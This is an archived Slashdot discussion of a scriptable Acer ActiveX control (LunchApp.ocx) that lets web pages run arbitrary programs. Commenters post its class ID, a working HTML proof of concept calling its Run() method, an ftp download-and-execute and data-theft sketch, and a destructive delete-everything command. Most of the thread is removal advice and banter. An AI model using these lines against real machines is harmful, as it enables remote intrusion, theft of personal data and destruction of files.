×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Acer May Be Bugging Computers

Zonk posted more than 7 years ago | from the might-want-to-look-into-this dept.

Privacy 396

tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

396 comments

Aren't we a little late on this story? (0, Informative)

Anonymous Coward | more than 7 years ago | (#17504708)

Change Log
2006-11-19 - Public Release.

Phew! (1, Interesting)

gardyloo (512791) | more than 7 years ago | (#17504720)

Typing this on an Acer laptop. Sure glad I wiped the thing immediately and put linux on. So far I've really liked the laptop, but Acer is one company which gives you "restore" DVDs which contain a disk image and which wipe everything else off if you want to use them to reinstall Windows. Hate that.

Re:Phew! (5, Funny)

BrainInAJar (584756) | more than 7 years ago | (#17504736)

Mine shipped with Linux, which I immediately wiped & installed FreeBSD, but I appreciate the thought

Re:Phew! (5, Funny)

gardyloo (512791) | more than 7 years ago | (#17504760)

Haha. I was just joking. I actually use mine by drilling through the case, and making and breaking a couple of connections between the motherboard and three "C" cells hooked in series with paperclips. Manually, beeyotch. Real men type in raw binary without the keyboard. But I appreciate the thought.

Re:Phew! (-1, Troll)

shoolz (752000) | more than 7 years ago | (#17504904)

I await the day when Linux is so ubiquitous that lusers like you are waving your dicks about how many Windows b0xen you have in your netw0rk. STFU. We've heard it before.

Re:Phew! (1)

Kadin2048 (468275) | more than 7 years ago | (#17505028)

Just out of curiosity, where did you get it pre-installed with Linux? And would you recommend wherever you bought it from?

I'm still hoping that Lenovo will see the light and sell ThinkPads (or whatever they're calling them these days) without Windows; I never could get a bare one from IBM, and there was always just something galling about buying software that I don't want to use.

Re:Phew! (4, Interesting)

BrainInAJar (584756) | more than 7 years ago | (#17505232)

There was a local computer store in town that was selling them, and apparantly Acer shipped them to the store with Linux preinstalled. Some strange Chinese distro I'd never heard of... I'd reccomend the laptop, yeah... Served me well so far... warranty just expired and I've had no need to use it.

and no, I wasn't going for humour mods... my laptop actually shipped with Linux, and I did wipe it for FreeBSD (it runs OpenSolaris now, but that's beyond the point).

Re:Phew! (4, Informative)

belmolis (702863) | more than 7 years ago | (#17505344)

I recently bought a laptop with Ubuntu pre-installed from The Linux Store [thelinuxstore.ca], which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.

Re:Phew! (2, Informative)

GFLPraxis (745118) | more than 7 years ago | (#17504746)

It's a good thing...Other companies like HP and Sony no longer include restore disks, so when a Windows user gets a virus that messes some system files up, they have to pay ridiculous amounts to order restore disks if they didn't remember to do it themselves.

Re:Phew! (3, Informative)

mallardtheduck (760315) | more than 7 years ago | (#17504786)

My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.

I don't know about SONY, but in my experience, HP are more generous than most in terms if disks included with their PCs.

Re:Phew! (1)

jellie (949898) | more than 7 years ago | (#17505288)

Did you buy this in the US? I bought an HP desktop 3 years ago and I was surprised that it came with no disks (I hadn't purchased a computer in a while before that), so I even called them and asked. Nope, they weren't going to give me CDs. Just burn the recovery CDs, they said. So I did, and I have never used them.

I bought a Compaq laptop 7 months ago. It didn't come with anything. I installed vanilla XP2 on it and then had to spend an hour chatting with their tech support because their useless website didn't have modem and sound drivers.

This time I just built my own PC.

Re:Phew! (-1, Flamebait)

Le Marteau (206396) | more than 7 years ago | (#17504820)

ridiculous amounts to order restore disks if they didn't remember to do it themselves

What, are you working as a WalMart greeter, or still living in your mama's basement?

"ridiculous?" Well, yeah, if you're used to getting everything for free. Hundred bucks or so for an XP 'upgrade' if you have some previous disc.

Whoop-de-fricken' do. I'll get over it. I pretty much expect I gotta buy a license, whenever I buy a new box. Hundred bucks. "ridiculous". Hate to hang with you, you cheap bastard. I spend a hundred bucks on dinner sometimes, and that's just for me, not including the babe or the vino. Sheesh.

Re:Phew! (0, Troll)

ResidntGeek (772730) | more than 7 years ago | (#17504832)

And I'm sure you have no problem being the reason everyone hates Americans. Other people try not to be like that.

Re:Phew! (5, Funny)

pboulang (16954) | more than 7 years ago | (#17504880)

I spend a hundred bucks on dinner sometimes, and that's just for me, not including the babe or the vino. Sheesh.
Do you have to pay for the babe by the hour or is it a flat rate?

Re:Phew! (0)

Anonymous Coward | more than 7 years ago | (#17505202)

If she's flat, she ain't interesting.

Re:Phew! (1, Informative)

aauu (46157) | more than 7 years ago | (#17504848)

I bought an HP core 2 duo media center pc back in September. Came with all the software in a special partition on the first hard drive. HP has online option to purchase restore dvds for $17 (shipping). Bought the disks just because I could. I have been running Vista RC2 o this computer and do not intend to go back. Vista is much more responsive than XP. One minor annoyance is that serial ports are no longer part of computer systems these days. I need to hook up a device that only supports serial not usb. Not all vendors are in this decade.

Re:Phew! (3, Informative)

phalse phace (454635) | more than 7 years ago | (#17505078)

Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.

Re:Phew! (3, Informative)

Propaganda13 (312548) | more than 7 years ago | (#17505366)

Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.

$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.

Re:Phew! (2, Insightful)

east coast (590680) | more than 7 years ago | (#17504792)

you're missing the point. what happens on the day that they start putting out linux and simply "make things easier for the end user" by circumventing some common sense security measures?

And now that it's publicized... (4, Interesting)

mallardtheduck (760315) | more than 7 years ago | (#17504740)

I expect exploits for this to start appearing within days, if not hours...

Re:And now that it's publicized... (3, Interesting)

aauu (46157) | more than 7 years ago | (#17504768)

Isn't there a $50,000 bounty on vista capable exploits? slashdot announces ..... Profit $$$$

Re:And now that it's publicized... (1)

FractalZone (950570) | more than 7 years ago | (#17504790)

Real Computers are not made by Du^Hell or Acer.

Re:And now that it's publicized... (5, Funny)

Joebert (946227) | more than 7 years ago | (#17505024)

Exactly, they're made by the Tooth Fairy & the Easter Bunny with the help of Santas' elves during their offseasons.

Re:And now that it's publicized... (1)

sidb (530400) | more than 7 years ago | (#17504966)

You seem to have omitted step 2. Could you please clarify what it was?

Re:And now that it's publicized... (2, Insightful)

Bargearse (68504) | more than 7 years ago | (#17505280)

I doubt it would be eligible for a bounty, as it won't run under Vista's default configuration. It can be made to run though :)

Re:And now that it's publicized... (1)

plover (150551) | more than 7 years ago | (#17504806)

Well, I just googled for the class ID, but didn't find anything other than links to this vulnerability warning. But I don't know of google will index attributes inside of <object> tags.

Re:And now that it's publicized... (5, Informative)

Ninwa (583633) | more than 7 years ago | (#17505038)

The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA

Re:And now that it's publicized... (1)

Joebert (946227) | more than 7 years ago | (#17505050)

Try searching for the Flash CLSID.
d27cdb6e-ae6d-11cf-96b8-444553540000

Opps! Nothing like bad publicity.. (1)

msimm (580077) | more than 7 years ago | (#17504930)

To keep corporations playing on the (more or less) straight and narrow.

Re:And now that it's publicized... (0)

codepunk (167897) | more than 7 years ago | (#17504968)

Give me the clsid of the control and method name and I can hook you up in about 45 seconds.

Uhh, there already IS an exploit... (5, Informative)

nweaver (113078) | more than 7 years ago | (#17504978)

Read the article: Theres a trivial piece of example "exploit" code running calc.exe.

But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.

Re:And now that it's publicized... (1)

dlanod (979538) | more than 7 years ago | (#17505146)

Considering it's present on my one year old Australian Acer, I'd say it's very very ripe for abuse.

present on Aspire 1690 (2, Informative)

Phil246 (803464) | more than 7 years ago | (#17504766)

Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?

Safe (2, Informative)

twitter (104583) | more than 7 years ago | (#17504858)

Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?

Sure, just go get the Mepis Patch [mepis.org]. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.

Really, do you think eliminating this one control will make your computer safe? Chances are there are coppies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malice is built in from Redmod before anyone else gets it.

Wow (2)

willyhill (965620) | more than 7 years ago | (#17504946)

The malice is built in from Redmod before anyone else gets it.

Are you really suggesting this is Microsoft's fault?

Re:Wow (1, Insightful)

codepunk (167897) | more than 7 years ago | (#17505084)

Well considering they are the creators of the almighty active x control that allows unsafe code execution in a browser, I would say yes he is suggesting that.

And he would be absolutely correct, well acer is not exactly off the hook here either.

@mozilla.org/process/util;1 (3, Informative)

MushMouth (5650) | more than 7 years ago | (#17505244)

Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.

Re:Wow (2, Insightful)

willyhill (965620) | more than 7 years ago | (#17505246)

I love that someone modded you up. So, if I give you a box of matches and you set fire to your house on purpose, you'd blame me? Kind of like people who pour hot coffee on themselves and file a lawsuit for a million bucks, right?

acer is not exactly off the hook here either.

That's an interesting way to put it. But I guess that's the only way to rationalize it if you were desperate enough to pin this on Microsoft for some reason.

Re:Safe (1)

Phil246 (803464) | more than 7 years ago | (#17504958)

No, but it will make it safer (if only a little) then leaving it there.
Ive set its kill bit in the mean time though

Re:Safe (1)

twitter (104583) | more than 7 years ago | (#17505252)

No, but it will make it safer (if only a little) then leaving it there. Ive set its kill bit in the mean time though

Good luck.

Re:present on Aspire 1690 (5, Informative)

valeurnutritive (1048314) | more than 7 years ago | (#17504954)

To remove this from your machine.

Goto Start > Run and type:
regsvr32 -u lunchapp.ocx

(-u for uninstall)

Re:present on Aspire 1690 (1)

Teddy_Roosevelt (757045) | more than 7 years ago | (#17505308)

To remove this from your machine.

Goto Start > Run and type:
regsvr32 -u lunchapp.ocx

(-u for uninstall)


Why not just create a website that will use this vulnerability to run this "unregister" command on our machines and eliminate the vulnerability? It would be a nice public service.

Re: Not present on my Aspire 5024 (1)

Bootvis (913169) | more than 7 years ago | (#17505240)

It's not present on the Aspire 5024 WLMI. Disclaimer: Could be because I removed some Acer-stuff.

Acer Aspire 3624WXMI (0)

Anonymous Coward | more than 7 years ago | (#17504774)

I did a search file for LUNCHAPP.OCX on my Acer Aspire 3624WXMI and found none.

The 4th USB port (3, Interesting)

wikinerd (809585) | more than 7 years ago | (#17504782)

I once bought a Fujitsu-Siemens laptop with 3 USB ports, but when I opened it I noticed it had a non-visible 4th USB port near the hard disk that you needed a screwdriver in order to access. No mention of it in Fujitsu-Siemen's manuals and other documentation that I got with the laptop, and no mention of it on their website. Although visually hidden, the port was visible via diagnostics software. I thought that this could be one way to put a spy antenna or other device on a laptop (a USB port provides 500mA of power which is enough to power a large range of antennas and electronics). It could be used to put an anti-theft antenna revealing the laptop's location, to put a keylogger, or to put a backup device. In the end I just put a permanent flash key drive in it so I had a laptop with permanent flash storage in addition to the hard disk.

Re:The 4th USB port (4, Insightful)

mallardtheduck (760315) | more than 7 years ago | (#17504844)

Could just be there for optional "built-in" bluetooth or Wifi. A USB module is probably cheaper than an Mini-PCI.
Plus, if they do no wireless, Wifi-only and Wifi+BT models, with a single Mini-PCI slot, they would need both Wifi and Wifi+BT cards, if they have a "hidden" USB port, they only need to stock Wifi mini-PCI cards and USB bluetooth adapters, the same adapters that are sold independently.

Re:The 4th USB port (2, Insightful)

starwed (735423) | more than 7 years ago | (#17504872)

When I bought a USB2 PCI card for my desktop, most models had a single internal USB port as well as all the external ones. I think this is pretty common, and nothing nefarious.

It's an appendix. (4, Interesting)

Kadin2048 (468275) | more than 7 years ago | (#17505076)

I think a lot of computers have internal ports that were put in there as part of the original board design, but were never taken advantage of during configuration or subsequent system design.

In an old Mac of mine (G4 "Sawtooth"), there is an internal Firewire port right on the motherboard, even though there are virtually no (to my knowledge anyway) internal Firewire devices available. The most useful thing you can do with it is run it out to a dummy card-slot panel and give yourself an extra external port. (I suppose you could also run another HD by using a IDE to FW converter card, if you could find a small enough one.)

It's there, I suspect, because when they were designing that mobo, it wasn't clear that Firewire would be used primarily for DV and external peripherals, and wouldn't become the internal-peripheral interconnect of choice. For all the designers knew, Firewire could have become like SATA is today, with hard drives being built for it natively. In that case, having one inside the case could be useful as hell (particularly since that machine has space for 4 or 6 internal 3.5" HDs and 2 removable-media drives). They had no way of knowing that it would end up being the electronics version of an appendix.

I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.

Re:The 4th USB port (1)

dreamlax (981973) | more than 7 years ago | (#17505212)

I fix laptops for Toshiba for a living . . . and it is not uncommon for USB ports to be found inside. The most common case for Toshiba laptops is the fingerprint reader, it doesn't connect with an actual "USB plug" but a 4-line ribbon wire which slotted and bracketed into a tiny slot on the motherboard. The device uses the USB standard in terms of data transfer, probably because it makes the software easier to implement as well.

You'll probably find that it is a similar case for your laptop. If there is a "built-in" device in your laptop that can be controlled via software, it is probably a USB device.

So can this be neutralized? (1)

Toddlerbob (705732) | more than 7 years ago | (#17504798)

Is there simply a file I can delete to fix this? I got an Acer desktop for my sister, and I'd like to tell her what to delete to get rid of this threat.

Re:So can this be neutralized? (2, Informative)

plover (150551) | more than 7 years ago | (#17504900)

Click Start/Run, then in the box type this:

del c:\windows\system\lunchapp.ocx
That will delete the object itself.

Re:So can this be neutralized? (2, Informative)

Lehk228 (705449) | more than 7 years ago | (#17505092)

run regsvr32 -u lunchapp.ocx from start>run it will unload it without having to edit the registry

Re:So can this be neutralized? (1)

Wanon (808109) | more than 7 years ago | (#17505358)

Uninstall itself! http://wanon.bur.st/uninstall.html [wanon.bur.st]

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx");
</script>
</html>
</body>

Isn't it a little bit naive (2, Interesting)

zappepcs (820751) | more than 7 years ago | (#17504814)

to think that Acer and others have not been doing this for years? Put on the tin foil hat now, they may be doing so in conjunction with governments. Lets not stop there, your ISP and phone company might also be doing the same thing?

I bet that buried in the EULA somewhere is a statement about remote support or some other such thing that would negate any complaints about this code as far as culpability goes. Wonder what they will do now that the botnet boys know its there? Just one more reason that people who want to have a safe computer should learn how to administer one properly... IMO.

Re:Isn't it a little bit naive (2, Insightful)

Telvin_3d (855514) | more than 7 years ago | (#17504892)

While I agree with you in general paranoid principle, I think the last bit is a little naive. It's like saying that if you want to have a safe house, you should be able to build your own in order to make sure there is no secret explode-on-remote-command hardware installed. Yes, people need to pay a little attention, but this type of shit is above and beyond anything that should be expected.

P.S. I want to see Holmes on Homes run across a secret explode-on-remote-command thing in an episode. That would make my week.

Re:Isn't it a little bit naive (2, Interesting)

zappepcs (820751) | more than 7 years ago | (#17505068)

I was thinking that 'meh, Telvin is probably right' but I thought about it again. Not to take an opportunity to diss you or anyone, but rather to explain my point a bit better.

Anyone, almost, can get a license to drive a car. The few that will put power steering fluid in their oil because they know nothing about cars will learn a very expensive lesson. There are many examples here where just a grounding of common sense would save people from very costly and perhaps embarrassing episodes. There are awards everywhere for people that do very stupid things such as the Darwin awards. The evidence of my point is all around us, but for some reason people think that technology should simply work as simple as a toaster. Those same people forget to think about all the people that put pop-tarts in the toaster with the wrapper still on, or worse, put them in the microwave.. resulting in the required shower of sparks. All of the technology around us is capable of doing things the wrong way. It is only through common experience and learning that most people manage to not fsck things up. At this point I should say how very glad I am that people are not want to buy their own table saw or jack hammer. These can do way more damage than a George Foreman grill mixed with some Jack Daniels. I still worry every time they allow the sale of fireworks to joe public.

Even people who are only mildly aware of how a vehicle works are usually able to determine that something is wrong because its making a new sound, or not steering right etc. This is not so with computers. People are so perplexed at how complex it must be that they remain clueless as to what might be wrong when it stops working as well as it seemed that it used to work.

Some people think that all emails they get should be opened, and out of curiosity, they open nearly every attachment they receive under the mistaken notion that their ISP or AV software is going to protect them.

Perhaps they need not know how to administer a Windows network, but they should have some clues, like they have with almost every other kind of technology they use. BTW, yes, I believe that everyone who has a flashing 12:00 on their VCR/DVD player should be fined until they know how to fix it. I also think I should be able to sell them clocks that never need to be set... but that is an open market forces kind of thing. The flashing clock doesn't really hurt anyone while allowing a botnet to p0wn your machine does. If there is a license to make sure only responsible drivers are on public roads, perhaps we need something similar for computer users. There are certification programs that people can take. Its just common sense that I think they need, not the ability to rewrite the kernel.

Hopefully that clears up what I meant to say?

to those of us uneducated (1, Interesting)

Anonymous Coward | more than 7 years ago | (#17504824)

Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.

Re:to those of us uneducated (5, Informative)

Anonymous Coward | more than 7 years ago | (#17504866)

Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.
One could, for example, use the Windows ftp.exe client to download an arbitrary program (e.g. botnet software) and then execute it. I'm certain there are even better ways to do it but this one could work well enough to completely take over the machine.

Re:to those of us uneducated (1)

Lehk228 (705449) | more than 7 years ago | (#17505100)

could also use the windows FTP command to upload data from the hard drive such as cookies or excel spreadsheets etc.

Re:to those of us uneducated (3, Informative)

codepunk (167897) | more than 7 years ago | (#17504922)

I have not seen the control or have a copy of it but it can be a simple as a couple of lines
of script in a web page. Now I can possibly own most acer laptops visiting that page.

The script could do something like this
ftp somehost
ftp get somefile
execute somefile

Bingo I own your laptop.

Or say I just ftp your firefox data so I can grab your history, passwords etc.

Re:to those of us uneducated (1)

2ms (232331) | more than 7 years ago | (#17505052)

Windows has in-built ftp? This script is able to pass that much info (like url and sequence of app launching/operation commands)?

Re:to those of us uneducated (2, Informative)

codepunk (167897) | more than 7 years ago | (#17505106)

You bet open up a command window and type ftp you will notice that it has a built in ftp client. Simply calling the run method on this control in a script and you can run anything you want, download or upload anything you want just by the client browsing a web page.

Re:to those of us uneducated (0)

Anonymous Coward | more than 7 years ago | (#17505112)

Yes, there is a commandline application called 'ftp' shipped with Windows.

Re:to those of us uneducated (0)

Anonymous Coward | more than 7 years ago | (#17505174)

It's a really flaky and unreliable FTP program but yes, it's been there forever.

Re:to those of us uneducated (0)

Anonymous Coward | more than 7 years ago | (#17505006)

RTFA, he provides an example that opens up calc.exe

Re:to those of us uneducated (4, Interesting)

djupedal (584558) | more than 7 years ago | (#17505046)

"Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner."

A beginner & an AC - wants to know exactly how to execute the 'bad thing', and promises not to inhale :)

Oh...rudimentary...well, that's different. Since Acer would presumably have the power to control any aspect of your computer when you use it to log onto any webpage, all they need to do is to wait for you to access a site under their control, and bingo, they can lift all of your installation logs, cookies, saved passwords, MS WORD docs containing the words 'budget; personal; finance; medical; records; debt; sex, SSN (and all applicable variants),etc.

OK, let's say you are gullible enough to think that they can take all of that they want, and still not put you at risk - now, think for just a moment about who 'they' are...? What are the odds of 'they' going to all that trouble and not having some plan to do something with what they glean that you will not be pleased with...? Still not impressed?

How's this... Acer sits around and waits for just the right time and boom - they toggle a flag on your computer that makes it appear that it needs to have XYZ repaired, and what do you know, the only resource is...ACER!!

A new age variation on the old water-bag trick. One guy owned two service stations. One station was the last stop before heading out of LA, into the desert, heading for Palm Springs. The other was the last service station before heading out of Palm Springs, out across the desert, heading for LA. When a car stops on the LA side, the station staff sell the unaware traveler a scary story about being in the desert and having the car break down from overheating. Seems, tho, if you buy a canvas water-bag filled with water, and hang it on your car's front grille, it will supposedly help cool the air before it flows across the radiator. Best insurance money can buy. Thank ya now, ya'll have a safe trip! :)

Problem is, that big 'ol canvas bag actually blocks the airflow, and by the time you get near the other side of the desert, your car overheats and you have to pay the Palm Springs service station to come and tow your car and fix everything that broke from overheating. Not a small fee, even in those days. They explain how the bag is what did the damage, and the hapless owner tells them to keep it.

What do you think the Palm Springs service station guys do with the demon water-bag? Well, of course, they sell it to the next dupe going from there to LA, and even help by attaching it to the grille of his car. Thank ya now, ya'll have a safe trip! :)

I figure that one bag most likely made dozens of round trips across the Mohave, and put at least two generations of kids thru law school :)

Rumor has it owning those two stations was the fastest way to retirement until the big casinos came in and the real pocket-picking took off.

Re:to those of us uneducated (1)

nacturation (646836) | more than 7 years ago | (#17505374)

A new age variation on the old water-bag trick. One guy owned two service stations. One station was the last stop before heading out of LA, into the desert, heading for Palm Springs. The other was the last service station before heading out of Palm Springs, out across the desert, heading for LA.
Sounds rather apocryphal. However, taken in the same way as Aesop's Fables, it's a good story nonetheless.
 

Re:to those of us uneducated (0, Redundant)

fabs64 (657132) | more than 7 years ago | (#17505048)

Seeing that no one gave you a suitably chilling example of what can be done with already installed programs...

del /F /S /Q c:\* (probably wrong, not good with windows commands but this should delete everything under c:\)

Lessons learned... (5, Insightful)

Anonymous Coward | more than 7 years ago | (#17504882)

1) Whenever possible, build your own.

2) When you can't build your own (laptops), *always* re-install your OS after purchasing a new computer, and for God's sake use a real install CD and not the recovery one provided by the manufacturer.

cvrsd;lk.a5df.a,pfll; (2, Funny)

Tablizer (95088) | more than 7 years ago | (#17504886)

Can't...get...back...contr...Everything is Fine and Happy. Nothing to Worry About. Have a Nice Day!
     

LunchApp.ocx (5, Funny)

snicho99 (984884) | more than 7 years ago | (#17504912)

Don't panic. It's not a method for launching applications.

The original article failed to notice that it's a Lunch application. It's actually a throw back to when Acer briefly partnered up with 180solutions to deliver targeted pop-under sandwiches to hungry laptop owners. The idea being that after seventeen hours of trying to uninstall Bonsai Buddy the computer user would be debilitated through starvation and susceptible receptive to sp(iced h)am..

The program was abandoned when Acer's engineers failed to perfect the wasabi-over-ip protocol - leaving the whole system unreliable an prone to bagel overrun.

SWAH!?! (4, Funny)

foo fighter (151863) | more than 7 years ago | (#17504948)

This news is unbelievable.

Acer still makes computers? People still buy them?

I remember Acer being a budget brand with a bad rep for quality and customer service back in the mid- to late-90s. I can't believe they are still a going concern.
 

Re:SWAH!?! (0)

Anonymous Coward | more than 7 years ago | (#17505096)

at least they don't have exploding batteries.

Re:SWAH!?! (1)

pchan- (118053) | more than 7 years ago | (#17505176)

Acer is the number 4 maker of personal (ie, non-server) computers in the world, behind HP, Dell, and Lenovo and ahead of Apple. At least that's what the statistics say, I've yet to see anyone using an Acer.

Re:SWAH!?! (1)

BrainInAJar (584756) | more than 7 years ago | (#17505208)

I've yet to see anyone using an Acer.

Look harder?
Every other laptop I see these days is an Acer. Hell, I'm on an Acer right now (the Aspire series run Solaris fantastically).
Quality's not bad on them these days and they're about half the price of the exact same laptop rebranded (Toshiba made a line of laptops that had the same hardware including case as the Aspire's, I imagine they were just rebrands)

Easy fix for this problem (2, Insightful)

Shadyman (939863) | more than 7 years ago | (#17505032)

1. Format your hard disk 2. Install Linux 3. Return your Windows for a refund (Profit!)

Re:Easy fix for this problem (2, Insightful)

black hole sun (850775) | more than 7 years ago | (#17505284)

Of course simply deleting the file in question is just way too off-the-wall for most users.

"Pre-hosed" -- always wipe it (4, Interesting)

mlts (1038732) | more than 7 years ago | (#17505082)

On all new computers, be PCs, Suns, RS/6000s, or anything, after getting the machine out of the box and plugged in, I tar (or ghost in the case of PC recovery partitions) off anything preinstalled to two backups, then format the hard disk (or disks/arrays) on the machine. After the disks are formatted, I then install the OS and drivers and get the machine to the latest patches that I can via CDs. Only after this and a lockdown check does the machine see the network.

I've just seen too many machines come pre-hosed from the factory. For anything that sees production use, I want to pack my own parachute and know exactly what is on the machine.

On PCs, I try to find drivers from the underlying OEM rather than depend on the PC vendor, as usually the PC vendor's drivers tend to be outdated, except for motherboard/system board/IO planar flash.

Who Wudda Thought (1)

BoRegardless (721219) | more than 7 years ago | (#17505102)

Anyone would be that utterly deceptive...I mean...certainly not a manufacturer of hardware...or certainly not a major software developer...uh...oh, I forgot, except for those accidental bugs in the OS software...and indeed the unfortunate BBBBrowser.

Bug this! (0)

Anonymous Coward | more than 7 years ago | (#17505136)

RunLikeFuck()

Aspire Phone Home (1)

CranberryKing (776846) | more than 7 years ago | (#17505164)

No suprise really. Nice little machine but the battery sucks ass. 1 hour average.

What I want is a support/download page that works like allofmp3. A company and site that respects it's customers and provides what they want without any BS.

IE7 stops the attack (1)

suv4x4 (956391) | more than 7 years ago | (#17505228)

Notice that in the article if you have IE7 it'll stop the attack since the user will be notified the page executes an unknown ActiveX and ask for permission (in the yellow creeping bar) before doing anything.

Of course IE7 is only at 20% vs IE6 at more than 60%, but still, shows the browser going in the right direction.

I'm not impressed with this IE7 "improvement" (1)

Cafe Alpha (891670) | more than 7 years ago | (#17505304)

The right direction would be running screaming away from active X entirely.

Let me know when Microsoft admits that Active X was a terrible idea and leaves in uninstalled in future versions of the OS.

Re:I'm not impressed with this IE7 "improvement" (2, Informative)

suv4x4 (956391) | more than 7 years ago | (#17505348)

The right direction would be running screaming away from active X entirely.

The hatred towards ActiveX is largely unfound. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins.

The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than ActiveX can in IE7, with all default settings.

IE7 will at least ask you now if a page wants to run an *already installed* control. Does Firefox do this? No.

(of course there's the question: should it, but apparently due to jerks that preinstall craps on laptops, yea..)

Blank laptops (very very old story) (2, Interesting)

JHWH (1046444) | more than 7 years ago | (#17505270)

I would say it's time now to force manufacturers/distributors/retailers to provide blank laptops at least as an option.
First, if I I have to pay for a preinstalled OS, I cannot be made responsible for that installation. The rescue CD is a kind of responsibility contract.
Second, if I can get a blank PC, I am the one responsible for whatever will run on it without paying extra money.
Third, if I cannot choose, the one who chose in my behalf is to be responsible for whatever happens in my machine for both hw and sw.
So finally, they'd better leave the option to the customer.
And, all this would apply to whatever the OS is, not just the four colours flag OS.

What's this control named "Rootkit" do? (2, Interesting)

Cafe Alpha (891670) | more than 7 years ago | (#17505272)

They named the interface "Run(Drive,FileName,CmdLine)"

And that's why this vulnerability was found, because the name was so damn obvious. It's as if you had an active x control registered that was named "rootkit".

This one must be the decoy. Imagine what else could be hidden in there and not named "Please throw me in the briar patch!"
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...